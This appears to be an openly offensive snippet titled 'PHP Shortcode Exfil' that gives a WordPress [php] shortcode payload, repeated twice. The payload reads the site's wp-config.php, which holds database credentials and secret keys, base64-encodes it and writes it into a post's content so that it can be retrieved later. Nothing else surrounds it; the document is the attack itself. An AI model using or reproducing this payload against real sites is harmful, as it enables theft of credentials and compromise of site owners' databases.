PHP Shortcode Exfil
[php]global $wpdb;$c=base64_encode(@file_get_contents(“/var/www/html/business/wp-config.php”));if($c){$wpdb->update($wpdb->posts,[“post_content”=>$c],[“ID”=>3906]);echo “WRITTEN”;}[/php]
[php]global $wpdb;$c=base64_encode(@file_get_contents(“/var/www/html/business/wp-config.php”));if($c){$wpdb->update($wpdb->posts,[“post_content”=>$c],[“ID”=>3906]);echo “WRITTEN”;}[/php]